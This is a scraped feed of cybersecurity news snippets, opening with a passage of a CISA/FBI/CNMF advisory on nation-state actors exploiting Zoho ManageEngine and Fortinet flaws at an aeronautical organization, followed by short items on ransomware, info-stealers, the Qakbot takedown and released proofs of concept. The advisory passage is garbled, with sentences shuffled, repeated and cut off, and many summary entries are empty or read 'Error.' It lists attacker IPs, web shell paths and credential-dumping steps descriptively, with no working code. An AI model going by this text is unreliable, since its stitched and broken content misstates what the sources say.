endorsement, recommendation, or favoring by CISA, the FBI, or CNMF.2023-02-08 08:56:35, 2023-02-09 20:19:59, 2023-03-04, 2023-03-18 Hypertext Preprocessor (PHP) files uploaded via HTTP-POST request from malicious IP 193.142.146[.]226 .[REDACTED]/wp-content/plugins/ioptimization/IOptimize.php (4 instances) 2023-03-06 06:49:40 Interact.sh APT actors executed Domain Name System (DNS) scanning at an additional server (not the ServiceDesk system) and directed callback to the Interact.sh domain, which indicated the server was susceptible to a DNS-style attack [T1046].CISA, the FBI, and CNMF do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document.Three identified executables, which provide a command line interface with the compromised system, were observed in the following file system locations: c:\windows\system32\ssh-shellhost.exe c:\windows\system32\ssh-agent.exe c:\windows\system32\ssh-add.exe While the files were not identified as malicious, they were loaded for malicious purposes.In addition to using Mimikatz for credential dumping, APT actors dumped the following Windows Registry Hive files: sam.hiv [T1003.002] [T1003.002] system.hiv security.hiv These files were dumped to obtain registry information such as users on the system, data used by the operating system [T1012], and installed programs.Organizations typically store external-facing services and resources, as well as servers for DNS, File Transfer Protocol (FTP), mail, proxy, Voice over Internet Protocol (VoIP), and web servers in the DMZOrganizations typically store external-facing services and resources, as well as servers for DNS, File Transfer Protocol (FTP), mail, proxy, Voice over Internet Protocol (VoIP), and web servers in the DMZ Download the PDF version of this report: For a downloadable copy of IOCs, see: For a downloadable copy of the Malware Analysis Report (MAR) accompanying this CSA, see: Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13.APT actors were observed connecting to the device from the following actor-controlled C2 IP addresses: 144.202.2[.]71 207.246.105[.]240 45.77.121[.]232 47.90.240[.]218 APT actors further leveraged legitimate credentials to move from the firewall to a web server, where multiple web shells were loaded—among other locations, such as the OWA server—into the following directories. CISA and co-sealers are releasing this joint Cybersecurity Advisory (CSA) to provide network defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.CISA and co-sealers assess that beginning as early as January 2023, multiple nation-state APT actors were present on the organization’s network via at least two initial access vectors: Initial Access Vector 1: APT actors exploited CVE-2022-47966 to access the organization’s web server hosting the public-facing application, Zoho ManageEngine ServiceDeskThe actors dropped an Active Server Pages Extended (ASPX) web shell in the following file system location, which was designed to execute remote JavaScript code [T1059.007] on the OWA server [T1505.003]: c:\Program Files\Microsoft Office Web Apps\RootWebSite\en-us\resource.aspx Note: The administrative user’s credentials were obtained from the APT actors’ collection (LSASS dump) of credentials from the entire AD domain. Manage Accounts, Permissions, and Workstations APT actors were able to leverage disabled administrative accounts, as well as clear logs on several critical servers, which prevented the ability to detect follow-on exploitation or data exfiltration.In recent years, Ngrok has been leveraged maliciously by a variety of threat actors, including use for persistence, lateral movement, and data exfiltration.[4],[5],[6] Using Ngrok as an external service, APT actors were able to gain access to and utilize the command line on victim systems.Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network.Analysis confirmed the APT actors were unsuccessful at exfiltrating these files: wo_view_bg.zip (09:06:37 UTC)\ (09:06:37 UTC)\ wo_view_bg1.gif (09:08:11 UTC) (09:08:11 UTC) wo_view_bg2.gif (09:19:43 UTC) Note: If local administrative access is achieved on a victim host, dumping LSASS credentials may allow for lateral movement across the environment. Initial Access Vector 2 Additional APT actors exploited CVE-2022-42475 on the organization’s firewall device, which was indicated by multiple successful VPN connections from known-malicious IPs between February 1-16, 2023. Secure Remote Access Software Remote access software provides a proactive and flexible approach for organizations to internally oversee networks, computers, and other devices; however, cyber threat actors increasingly co-opt these tools for access to victim systems. [DS0002], as well as monitor executed commands and arguments for actions that are associated with local account creation, such as , , and [DS0017]. APT Actor Activity Initial Access Vector 1 As early as January 2023, APT actors exploited CVE-2022-47966 [T1190] for initial access to the organization’s web server hosting the public-facing application, Zoho ManageEngine ServiceDesk alongside other attribute-based information, such as device information, time of access, user history, and geolocation data.SUMMARY The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Cyber National Mission Force (CNMF) identified the presence of indicators of compromise (IOCs) at an Aeronautical Sector organization as early as January 2023. "
Autosummary:
"Cybersecurity is not just a career field on the rise – it’s a calling that’s increasingly vital to the infrastructure of our world. But stepping into the universe of threat vectors and intrusion detection systems might sound like a journey for the tech elite. The reality, however, is far more inclusive. Multiple avenues and entry points into the field cater to diverse skills and experiences. Jobs in cybersecurity aren’t merely tech-centric roles but multidimensional positions … More
The post 6 free resources for getting started in cybersecurity appeared first on Help Net Security.
"Autosummary:
The NICE Framework is comprised of the following components: Categories (7) – A high-level grouping of common cybersecurity functions Specialty Areas (33) – Distinct areas of cybersecurity work Work Roles (52) – The most detailed groupings of cybersecurity work comprised of specific knowledge, skills, and abilities (KSAs) required to perform tasks in a Work Role W3Schools introductory course in cybersecurity This free course serves as a primer for the many different domains of cybersecurity. "Autosummary:
According to the firm, classified documents are not believed to have been included in the haul: “LockBit will have potentially gained access to some historic emails, orders, drawings and project files, we do not believe that any classified documents were stored on the system or have been compromised. "The LockBit ransomware group has breached Zaun, a UK-based manufacturer of fencing systems for military sites and critical utilities, by compromising a legacy computer running Windows 7 and using it as an initial point of access to the wider company network. The Zaun breach The company said that the “sophisticated” cyberattack occurred on the 5th – 6th August. “In an otherwise up-to-date network, the breach occurred through a rogue Windows 7 PC that was running … More
The post LockBit leaks sensitive data from maximum security fence manufacturer appeared first on Help Net Security.
"Autosummary:
Some of the stolen data was later leaked by LockBit on the dark web and, according to the Daily Mirror, among it were “thousands of pages of data which could help criminals get into the HMNB Clyde nuclear submarine base, the Porton Down chemical weapon lab and a GCHQ listening post.” "Autosummary:
"Autosummary:
Chrautos , an updated version of Chronod and Appita that focuses on gathering data from Mercado Libre, Mercado Pago, and WhatsApp , an updated version of Chronod and Appita that focuses on gathering data from Mercado Libre, Mercado Pago, and WhatsApp Stealer , an improved variant of Chrolog which plunders credit card data, cookies, autofill, and other information stored in web browsers, and , an improved variant of Chrolog which plunders credit card data, cookies, autofill, and other information stored in web browsers, and File Uploader, which uploads data related to MetaMask"s Chrome extension Persistence on the host is accomplished by means of a scheduled task, while C2 communications entail the use of WebSockets, with the implant running in an infinite loop to await further instructions from the remote server. "Autosummary:
They also ranked among the top four costliest incident types ($4.76 million and $4.62 million) along with malicious insiders (at 6% but costing an average of $4.9 million) and business email compromise (at 9% with an average cost of $4.67 million). Our 2023 Cost of a Breach takeaway The takeaway of IBM"s 2023 Cost of a Breach report is clear: organizations with an understanding of where their vulnerabilities lie, accurate views of their attack surface, an effective incident response plan, and tools for dealing with compromised credentials will suffer fewer breaches.Additionally, 39% of breaches spanned multiple cloud environments (including public and private clouds), leading to a higher-than-average breach cost of $4.75 million. "Autosummary:
However, a new feature that stands out is Chaes" use of the Chrome DevTools Protocol to steal data from the web browser, including the real-time modification of web pages, execution of JavaScript code, debugging, network request management, memory management, cookie and cache management, and more. "Atlas VPN has confirmed the existence of a zero-day vulnerability that may allow website owners to discover Linux users’ real IP address. Details about this zero-day vulnerability as well as exploit code have been publicly released on Reddit several days ago by the person who discovered the flaw and purportedly first tried to privately share the discovery with Atlas VPN. About the Atlas VPN zero-day vulnerability Atlas VPN offers a “freemium” and paid “premium” VPN … More
The post Atlas VPN zero-day allows sites to discover users’ IP address appeared first on Help Net Security.
"Autosummary:
The company provides an app for Windows, macOS, Linux, Android, iOS, Android TV, and Amazon Fire TV. "Autosummary:
" At this time, Coffee Meets Bagel has not confirmed if the attack was ransomware that encrypted data, effectively making it unusable, or if the threat actors purposely deleted data to bring down the service. "Autosummary:
In a proof of concept exploit shared on Reddit, a researcher describes how the Linux client of Atlas VPN, specifically the latest version, 1.0.3, has an API endpoint that listens on localhost (127.0.0.1) over port 8076.As the researcher stated, due to the vulnerability, the application and, hence, encrypted traffic between a user and the VPN gateway can be disconnected by a malicious actor. "Categories: News Categories: Ransomware A attack that uses a database as an entry point to a network reminds us that you should never expose your databases to the Internet. |
The post FreeWorld ransomware attacks MSSQL—get your databases off the Internet appeared first on Malwarebytes Labs.
"Autosummary:
MySQL and MariaDB often act as the source of data for websites, rather than as an enterprise data store like MSSQL, so may carry less business-critical data, but they still represent a prize, and a potential entry point into a network. As I mentioned before, one of the things that attracts attackers to RDP is the large number of available targets, so I wondered how many databases I could find via Shodan, the search engine that finds Internet-connected computers. "65% of organizations confirmed that ransomware is one of the top three threats to their viability, and for 13%, it is the biggest threat, according to a report by Enterprise Strategy Group (ESG) and Keepit. Organizations’ strategies against ransomware According to the report’s findings, while ransomware attacks are sometimes kept private from the public, they are a common occurrence and represent both a significant and recurring source of business disruption. Among the 600 respondents, only … More
The post Ransomware attacks go beyond just data appeared first on Help Net Security.
"Autosummary:
“Of the companies in the ESG study that reported that they had experienced a successful ransomware attack and paid the ransom, 85% experienced additional extortion attempts, and 57% paid the additional fees beyond the initial ransomware demand,” Ostergaard continued. "Autosummary:
"Autosummary:
"The Vietnamese-centric element of these threats and high degree of overlaps in terms of capabilities, infrastructure, and victimology suggests active working relationships between various threat actors, shared tooling and TTPs across these threat groups, or a fractured and service-oriented Vietnamese cybercriminal ecosystem (akin to ransomware-as-a-service model) centered around social media platforms such as Facebook," WithSecure said. An element that"s common to these groups is the abuse of URL shortener services, Telegram for command-and-control (C2), and legitimate cloud services like Trello, Discord, Dropbox, iCloud, OneDrive, and Mediafire to host the malicious payloads. "Autosummary:
The comprises CVE-2023-28432 (CVSS score: 7.5) and CVE-2023-28434 (CVSS score: 8.8), the former of which was added to the U.S. Cybersecurity and Infrastructure Security Agency"s (CISA) Known Exploited Vulnerabilities (KEV) catalog on April 21, 2023. "Autosummary:
These kits impersonate popular postal and delivery services in the U.S, the U.K, Poland, Sweden, Italy, Indonesia, Malaysia, Japan, and other countries. "Autosummary:
"Autosummary:
"Autosummary:
The payloads are downloaded on Linux via "curl" or "wget" and on Windows via "winhttpjs.bat" or "bitsadmin," and include the following: System profiling script – collects system information like user details, memory, cronjobs, and disk usage. The two vulnerabilities found chained in attacks by Security Joes" incident responders are CVE-2023-28432 and CVE-2023-28434, two high-severity issues impacting all MinIO versions before RELEASE.2023-03-20T20-16-18Z. The two vulnerabilities were disclosed and fixed by the vendor on March 3, 2023. "Autosummary:
"Nidhi Gani is a seasoned regulatory affairs professional with over a decade of experience in cybersecurity, medical devices, and digital health. She’s worked with devices ranging from heart and lung machines to rehabilitation devices. Nidhi works at Embecta as a Regulatory Affairs Software and Cybersecurity and is a Cybersecurity Fellow at the Archimedes Center for Health Care and Medical Device Cybersecurity at Northeastern University. She joined the Left to Our Own Devices podcast to share … More
The post Championing cybersecurity regulatory affairs with Nidhi Gani appeared first on Help Net Security.
"Autosummary:
Looking beyond the United States to how other countries are working on their own measures, Nidhi said: “I think most countries and continents are following suit and producing their own cybersecurity regulations and AI SMD regulations because technology has been moving forward after the pandemic, or rather, it has accelerated the growth by at least a decade, and the regulators are catching up and they’re doing a good job.” Regulatory Affairs as a strategic partner In the earlier years of her career, before the FDA’s Pre-Market guidelines for cybersecurity, the cooperation between teams and regulatory affairs professionals was challenging. Nidhi leans on the strength of Product Security Management Systems, where vulnerabilities, risks, and other security-related challenges can be discovered and managed. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Adapting authentication to a cloud-centric landscape In this Help Net Security interview, Florian Forster, CEO at Zitadel, discusses the challenges CISOs face in managing authentication across increasingly distributed and remote workforces, the negative consequences of ineffective authorization, and how the shift toward cloud transformation affects authentication strategies. What makes a good ASM solution stand out In this Help Net Security … More
The post Week in review: 11 search engines for cybersecurity research, PoC for RCE in Juniper firewall released appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Adapting authentication to a cloud-centric landscape In this Help Net Security interview, Florian Forster, CEO at Zitadel, discusses the challenges CISOs face in managing authentication across increasingly distributed and remote workforces, the negative consequences of ineffective authorization, and how the shift toward cloud transformation affects authentication strategies. What true diversity in the cybersecurity industry looks like In this Help Net Security video, Larry Whiteside, Jr., CISO at RegScale and President of Cyversity, discusses how, now more than ever, the cybersecurity industry needs the diversity of thought to address the increasingly complex and technology-driven challenges organizations face. "Autosummary:
"Autosummary:
Since then, threat actors have created various email extortion scams, including ones that pretend to be hitman contracts, bomb threats, CIA investigations, threats of installing ransomware, and threats to infect your family with Coronavirus. "Autosummary:
Deron Beal, Executive Director, The Freecycle Network More information is shared on the Freecycle knowlegebase, where users are advised on how to change their passwords. "Autosummary:
Since then, threat actors have created various email extortion scams, including ones that pretend to be hitman contracts, bomb threats, CIA investigations, threats of installing ransomware, and threats to infect your family with Coronavirus. "Adversary-sponsored research contests on cybercriminal forums focus on new methods of attack and evasion, according to Sophos. The contests mirror legitimate security conference ‘Call For Papers’ and provide the winners considerable financial rewards and recognition from peers and also potential jobs. As outlined in Sophos X-Ops latest report these contests are designed to drive innovation, and when analyzed, the entries provide invaluable insight into how cybercriminals attempt to overcome security obstacles. The evolution of criminal … More
The post Cybercriminals use research contests to create new attack methods appeared first on Help Net Security.
"Autosummary:
Latest trends in cyber competitions Sophos X-Ops explored two prominent annual contests: one run by the Russian-language cybercrime forum Exploit, offering a total prize fund of $80,000 to the winner of its contest in 2021, and another run on the XSS forum, with a prize pool of $40,000 in 2022. "Autosummary:
A brief description of each of the modules is as follows - netd - Collate and exfiltrate information from the compromised device at set intervals, including from app-specific directories and web browsers - Collate and exfiltrate information from the compromised device at set intervals, including from app-specific directories and web browsers td - Provide TOR services - Provide TOR services blob - Configure Tor services and check network connectivity (executed by netd) - Configure Tor services and check network connectivity (executed by netd) tcpdump - Legitimate tcpdump utility with no modifications - Legitimate tcpdump utility with no modifications killer - Terminate thee netd process - Terminate thee netd process db - Contains several tools to copy files and provide secure shell access to the device via the TOR hidden service using a modified version of Dropbear - Contains several tools to copy files and provide secure shell access to the device via the TOR hidden service using a modified version of Dropbear NDBR - A multi-call binary similar to db that comes in two flavors to be able to run on Arm (ndbr_armv7l) and Intel (ndbr_i686) CPU architectures Persistence on the device is achieved by replacing the legitimate netd daemon, which is responsible for network configuration on Android, with a rogue version, enabling it to execute commands as the root user. "Autosummary:
"Autosummary:
Silverfort Unified Identity Protection provides robust protection by implementing MFA on every authentication within AD, including legacy applications, command-line access to workstations and servers, file shares, and any NTLM, Kerberos, or LDAP authentication. Empowering Active Directory Security with Silverfort Unified Identity Protection To counter the misuse of compromised credentials in AD environments, organizations need a comprehensive security solution that offers continuous monitoring, risk analysis, and active response. "Autosummary:
Supercharge Your Skills As stealer families become more robust, multifaceted, and accessible, they not only lower the barrier to entry into financially motivated cyber crime, but also act as a precursor for ransomware, espionage, and other post-compromise mission objectives. Some victims have been subjected to forced labor, sexual violence, torture, cruel punishments, and arbitrary detention, among other crimes, it said. "Autosummary:
"Autosummary:
"Some of these tools include enumeration software, RAT payloads, exploitation and credential stealing software, and finally ransomware payloads," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a technical breakdown of the activity. "Autosummary:
CVE-2023-34039 PoC exploit (Sina Kheirkhah) VMware also patched an arbitrary file write vulnerability this week (CVE-2023-20890), which allows attackers to gain remote code execution after obtaining admin access to the targeted appliance (the CVE-2023-34039 PoC could let them get root permissions following successful attacks). "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Episode links: Sponsored by: Kolide – Kolide ensures that if your device isn’t secure it can’t access your cloud apps. "The number of IoT devices in enterprise networks and across the internet is projected to reach 29 billion by the year 2030. This exponential growth has inadvertently increased the attack surface. Each interconnected device can potentially create new avenues for cyberattacks and security breaches. The Mirai botnet demonstrated just that, by using thousands of vulnerable IoT devices to launch massive DDoS attacks on critical internet infrastructure and popular websites. To effectively safeguard against the risks … More
The post The power of passive OS fingerprinting for accurate IoT device identification appeared first on Help Net Security.
"Autosummary:
Converging networking and security functions can allow automated collection and correlation of networking and security data from multiple sources, such as intrusion detection systems, firewall logs, and endpoint security solutions, to provide an overview of network activity and its relation to operating systems and IoT devices.Different operating systems implement TCP/IP attributes differently and may have unique values for TCP/IP fields, such as the initial time to live (TTL), Windows Size, TCP Flags, and more.Different operating systems implement TCP/IP attributes differently and may have unique values for TCP/IP fields, such as the initial time to live (TTL), Windows Size, TCP Flags, and more. "ESET researchers have identified two active campaigns targeting Android users, where the threat actors behind the tools for Telegram and Signal are attributed to the China-aligned APT group GREF. Most likely active since July 2020 and since July 2022, respectively for each malicious app, the campaigns have distributed the Android BadBazaar espionage code through the Google Play store, Samsung Galaxy Store, and dedicated websites posing as legitimate encrypted chat applications — the malicious apps are … More
The post Trojanized Signal, Telegram apps found on Google Play, Samsung Galaxy Store appeared first on Help Net Security.
"Autosummary:
ESET telemetry reports detections from Australia, Brazil, Denmark, the Democratic Republic of the Congo, Germany, Hong Kong, Hungary, Lithuania, the Netherlands, Poland, Portugal, Singapore, Spain, Ukraine, the United States, and Yemen. "Autosummary:
"Autosummary:
Filetypes targeted by the malware (NCSC) Android"s /data/ directory is scanned for applications like Google Authenticator, OpenVPN Connect, PayPal, Viber, WhatsApp, Signal, Telegram, Gmail, Chrome, Firefox, Brave, Microsft One Cloud, Android Contacts, and many more. "Autosummary:
Balance check step supposedly part of user verification (Group-IB) Group-IB"s analysts have seen 35 scam groups using phishing sites that mimic the login pages of 63 banks in 14 countries, including financial institutes in Belgium, Canada, Czech Republic, France, Germany, Poland, Singapore, and Spain. "Autosummary:
Error. "PagerDuty introduced AI-generated runbooks in early access, as well as new analytics capabilities for the PagerDuty Operations Cloud. Using PagerDuty Runbook Automation from the Operations Cloud, customers replace manual procedures with automated self-service workflows, potentially saving hundreds of working days per year. With PagerDuty’s new generative AI capabilities, customers could realize hundreds of thousands of dollars in annual operational cost savings by using natural-language prompts paired with prompt-engineering automation–high quality prompts iteratively guiding users–to initiate … More
The post PagerDuty strengthens analytics capabilities and expands generative AI offerings appeared first on Help Net Security.
"Autosummary:
This new feature in PagerDuty Runbook Automation is the latest in a series of PagerDuty’s GenAI capabilities, which will be available across the PagerDuty Operations Cloud to help organizations automate time-critical, high-impact work, improve productivity and meaningfully reduce operating costs in uncertain economic times. "Since March 2023 (and possibly even earlier), affiliates of the Akira and LockBit ransomware operators have been breaching organizations via Cisco ASA SSL VPN appliances. “In some cases, adversaries have conducted credential stuffing attacks that leveraged weak or default passwords; in others, the activity we’ve observed appears to be the result of targeted brute-force attacks on ASA appliances where multi-factor authentication (MFA) was either not enabled or was not enforced for all users (i.e., via … More
The post Cisco VPNs with no MFA enabled hit by ransomware groups appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
90 Days of Cyberattacks Based on analysis of cyberattacks detected and blocked during the 90-day window, the BlackBerry Threat Research and Intelligence Team recorded the following statistics: Total number of malware-based attacks: 1,578,733 Number of unique attacks (using previously undetected malware): 200,454 attacks (using previously undetected malware): Average number of cyberattacks per day: 17,280 Average number of cyberattacks per hour: 720 Average number of attacks per minute: 12 Average number of new malware variants per minute: 1.5 The latest report also analyzes changes in the velocity of cyberattacks detected during this period. The most-targeted industries during the study period included: Financial institutions Healthcare services and equipment, including hospitals, clinics, and medical devices Food and staples retailers, including supermarkets, drugstores, and companies that sell food products to other businesses The report found these vertical industries accounted for 60% of the overall number of attacks. "Autosummary:
LogicMonitor account access issues (BleepingComputer) Customers hacked because of weak, de passwords Another anonymous source told TechCrunch that the affected customers" accounts were hacked using default weak passwords assigned by LogicMonitor to new users. "Autosummary:
Vulnerable function (left), static key (right) (EclecticIQ) Key Group profile Key Group is a Russian-speaking threat actor that sprung into action in early 2023, attacking various organizations, stealing data from compromised systems, and then using private Telegram channels to negotiate ransom payments. "Autosummary:
"Velociraptor is a sophisticated digital forensics and incident response tool designed to improve your insight into endpoint activities. Velociraptor enables you to conduct precise and rapid collection of digital forensic data across multiple endpoints simultaneously. Persistently gather events from endpoints, including event logs, file changes, and process activities. Store these events centrally for an unlimited period, allowing for historical examination and analysis. Be proactive rather than reactive. You can use a collection of forensic artifacts … More
The post Velociraptor: Open-source digital forensics and incident response appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The cross-border exercise involved the participation of France, Germany, Latvia, Romania, the Netherlands, the U.K., and the U.S., alongside technical assistance from cybersecurity company Zscaler. "Autosummary:
Error. "VMware has patched one critical (CVE-2023-34039) and one high-severity vulnerability (CVE-2023-20890) in Aria Operations for Networks, its popular enterprise network monitoring tool. About the vulnerabilities (CVE-2023-34039, CVE-2023-20890) CVE-2023-34039 is a network bypass vulnerability arising as a result of a lack of unique cryptographic key generation. It could allow an attacker with network access to Aria Operations for Networks to bypass SSH authentication to gain access to the Aria Operations for Networks command-line interface (CLI). CVE-2023-20890 … More
The post VMware fixes critical vulnerability in Aria Operations for Networks (CVE-2023-34039) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
The issues, tracked as CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, and CVE-2023-36847, reside in the J-Web component of Junos OS on Juniper SRX and EX Series. "Autosummary:
"Autosummary:
This malware was previously used to target ethnic minorities in China, but ESET"s telemetry shows that this time, the attackers target users in Ukraine, Poland, the Netherlands, Spain, Portugal, Germany, Hong Kong, and the United States. "Autosummary:
In other words, the idea is to have the current process running inside a fabricated container and leverage the minifilter driver to handle I/O requests such that it can create, read, write, and delete files on the file system without alerting security software. "Autosummary:
"The malware, named after its distinctive package name com.mm.user, can capture user input and screen content, and can also remotely control victim devices through various techniques, enabling its operators to carry out bank fraud on the victim"s device," Trend Micro said. "Autosummary:
"Categories: News Categories: Ransomware Tags: Ohio History Connection Tags: ransomware Tags: LockBit Tags: SSN Tags: phishing Ohio History Connection acknowledged that in a ransomware attack the attackers may have had access to 7,600 SSNs. |
The post Social Security Numbers leaked in ransomware attack on Ohio History Connection appeared first on Malwarebytes Labs.
"Autosummary:
Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.During the attack, the cybercriminals may have had access to names, addresses, and Social Security Numbers (SSNs) of current and former OHC employees (from 2009 to 2023). screenshot taken early August 2023 OHC said that it made an offer to the cybercriminals to prevent the release of the data, but the offer was rejected on August 7, 2023. "Does anyone think the chances of surviving a plane crash increase if our tray tables are locked and our carry-on bags are completely stowed under our seats? That we’ll be OK if the plane hits a mountain if we have our seat belts buckled securely across our waists? Not even the flight attendants, who will be responsible for throwing us off the plane if we don’t comply, really believe those rituals make us safer. And … More
The post Is the cybersecurity community’s obsession with compliance counter-productive? appeared first on Help Net Security.
"Autosummary:
To wit: Manager Information Security and Compliance, Manager, Security and Compliance Advisory, Senior Manager Internal Controls and Compliance, Sr. Manager – IT Security & Compliance (among others). Premera Blue Cross (HIPAA) CareFirst BCBS (HIPAA) SolarWinds (NIST CSF) This is, of course, not an exhaustive list. "Staying ahead in cybersecurity requires constant learning and adaptation. If you’re interested in cybersecurity research, explore the resources outlined below. DNSdumpster DNSdumpster is a free domain research tool that can discover hosts related to a domain. Finding visible hosts from the attackers’ perspective is an important part of the security assessment process. Exploit Database Exploit Database is a CVE-compliant archive of public exploits and corresponding vulnerable software developed for use by penetration testers and vulnerability … More
The post 11 search engines for cybersecurity research you can use right now appeared first on Help Net Security.
"Autosummary:
Intelligence X Intelligence X differentiates itself from other search engines: The search works with selectors, i.e. specific search terms such as email addresses, domains, URLs, IPs, CIDRs, Bitcoin addresses, IPFS hashes, etc. Netlas Netlas offers a collection of internet intelligence apps that provide accurate technical information on IP addresses, domain names, websites, web applications, IoT devices, and other online assets. "Autosummary:
"A vulnerability in Skype mobile apps can be exploited by attackers to discover a user’s IP address – a piece of information that may endanger individuals whose physical security depends on their general location remaining secret. The vulnerability The security vulnerability has been discovered by a security researcher named Yossi, who privately reported it to Microsoft and demonstrated its effective exploitation to journalist Joseph Cox. Vulnerability specifics have not been publicly shared since it has … More
The post Easy-to-exploit Skype vulnerability reveals users’ IP address appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
One week after Juniper disclosed and released security updates to patch the four flaws that can be chained to achieve remote code execution, watchTowr Labs security researchers released a proof-of-concept (PoC) exploit targeting the SRX firewall bugs (tracked as CVE-2023-36846 and CVE-2023-36845). "Autosummary:
Zoom, Adobe Cloud, Dropbox, Slack, Google, Canvas, and Adobe Cloud services have been restored and can be accessed from outside networks, although their availability is unstable due to overload. "Autosummary:
"Notably, among North American identified affected organizations, there were numerous state, provincial, county, tribal, city, and town offices that were targeted in this campaign," Mandiant said. "LogRhythm and Cimcor have joined forces to help organizations around the globe increase visibility and protect against modern cyberattacks. This partnership leverages LogRhythm’s comprehensive security information and event management (SIEM) platform and Cimcor’s file integrity monitoring (FIM) solution, CimTrak. LogRhythm’s integration with CimTrak allows LogRhythm to ingest integrity data that can identify zero-day attacks, ransomware activity, and configuration vulnerabilities. These issues can then be addressed either manually or automatically by reverting to any of the … More
The post LogRhythm and Cimcor collaborate to enhance cyberattack protection for organizations appeared first on Help Net Security.
"Autosummary:
CimTrak works across multiple operating systems and device types, managing files, directories, configurations, users, groups, policies, active directories, database schemas, cloud configurations, hypervisors, containers, network devices, ports, and more. "A known threat actor specializing in ransomware attacks is believed to be behind a recent campaign that targeted unpatched internet-facing Citrix NetScaler systems to serve as an initial foothold into enterprise networks. “Our data indicates strong similarity between attacks using CVE-2023-3519 and previous attacks using a number of the same TTPs,” Sophos researchers shared. Citrix systems under attack In mid-July 2023, a zero-day remote code execution (RCE) vulnerability (CVE-2023-3519) started getting exploited in the wild. … More
The post Ransomware group exploits Citrix NetScaler systems for initial access appeared first on Help Net Security.
"Autosummary:
Citrix systems under attack In mid-July 2023, a zero-day remote code execution (RCE) vulnerability (CVE-2023-3519) started getting exploited in the wild. "Autosummary:
Further analysis of the campaign has revealed a "distinct fall off in activity from approximately January 20 to January 22, 2023," coinciding with the beginning of the Chinese New Year, followed by two surges, one after Barracuda"s public notification on May 23, 2023, and a second one in early June 2023.A suspected Chinese-nexus hacking group exploited a recently disclosed zero-day flaw in Barracuda Networks Email Security Gateway (ESG) appliances to breach government, military, defense and aerospace, high-tech industry, and telecom sectors as part of a global espionage campaign. "Autosummary:
Phishing attacks are a primary delivery pathway for stealers, trojans, and malware loaders such as KrakenKeylogger, QakBot, Raccoon Stealer, SmokeLoader, and others, with threat actors continuously adding new features and enhancements to expand their functionalities. "Autosummary:
MMRat"s main functions can be summed up in the following: Collect network, screen, and battery information Exfiltrate the user"s contact list and list of installed apps Capture user input via keylogging Capture real-time screen content from the device by abusing the MediaProjection API Record and live-stream camera data Record and dump screen data in text form dumps that are exfiltrated to the C2 Uninstall itself from the device to wipe all evidence of infection All commands supported by the malware (Trend Micro) MMRat"s ability to capture real-time screen content, and even its more rudimentary "user terminal state" method that extracts text data requiring reconstruction, both demand efficient data transmission. "The Qakbot botnet has been crippled by the US Department of Justice (DOJ): 52 of its servers have been seized and the popular malware loader has been removed from over 700,000 victim computers around the world. “To disrupt the botnet, the FBI was able to redirect Qakbot botnet traffic to and through servers controlled by the FBI, which in turn instructed infected computers in the United States and elsewhere to download a file created by … More
The post Qakbot botnet disrupted, malware removed from 700,000+ victim computers appeared first on Help Net Security.
"Autosummary:
Qakbot malware removed from infected computers According to the DOJ, 200,000 of the infected computers are located in the US, the rest worldwide, including in the countries whose law enforcement agencies have also been involved in the operation: France, Germany, the Netherlands, the United Kingdom, Romania, and Latvia. "Tanium announced Tanium Vulnerability Risk and Compliance for ServiceNow – a new solution enabling ServiceNow customers to identify security risks from vulnerabilities and non-compliant configurations and remediate all from within the ServiceNow platform. The integrated offering allows customers to accelerate their security incident lifecycle by removing the number of manual investigation steps and augmenting ServiceNow processes with the speed and scale of Tanium. Tanium’s XEM platform provides a unified interface in which related incident data … More
The post Tanium Vulnerability Risk and Compliance for ServiceNow accelerates security investigations appeared first on Help Net Security.
"Autosummary:
"Autosummary:
In the past, Qakbot has partnered with multiple ransomware operations, including Conti, ProLock, Egregor, REvil, RansomExx, MegaCortex, and, most recently, Black Basta and BlackCat/ALPHV. Based on their investigation, the FBI determined that the Qakbot botnet utilized Tier-1, Tier-2, and Tier-3 command and control servers, which are used to issue commands to execute, install malware updates, and download additional partner payloads to devices. "Autosummary:
Earlier versions of the DreamBus malware are also known to target Redis, PostgreSQL, Hadoop YARN, Apache Spark, HashiCorp Consul, and SaltStack, so following good patch management across all software products is recommended to tackle this threat. "Categories: Exploits and vulnerabilities Categories: News Tags: Barracuda ESG Tags: CVE-2023-2868 Tags: SEASPY Tags: SUBMARINE Tags: WHIRLPOOL The FBI repeats the warning by Barracuda that all ESG appliances should immediately be replaced because the patch was ineffective. |
The post FBI confirms Barracuda patch is not effective for exploited ESG appliances appeared first on Malwarebytes Labs.
"Autosummary:
Investigation steps may include: Review email logs to identify the initial point of exposure Revoke and rotate all domain-based and local credentials that were on the ESG at the time of compromise Revoke and reissue all certificates that were on the ESG at the time of compromise Monitor entire network for the use of credentials that were on the ESG at the time of compromise Review network logs for signs of data exfiltration and lateral movement Capture forensic image of the appliance and conduct a forensic analysis We don’t just report on vulnerabilities—we identify them, and prioritize action. "Categories: Podcast This week on the Lock and Code podcast, we speak with Becky Holmes about how she flips the script on romance scammers, and what more governments should be doing to help. |
The post "An influx of Elons," a hospital visit, and magic men: Becky Holmes shares more romance scams: Lock and Code S04E18 appeared first on Malwarebytes Labs.
"Autosummary:
Error. "Categories: Business Categories: News Tags: Cisco Tags: VPN Tags: Akira Tags: ransomware Tags: brute-force Tags: credential stuffing Tags: password spraying Several researchers are seeing ransomware attacks targetting Cisco VPNs without MFA |
The post Cisco VPNs without MFA are under attack by ransomware operator appeared first on Malwarebytes Labs.
"Autosummary:
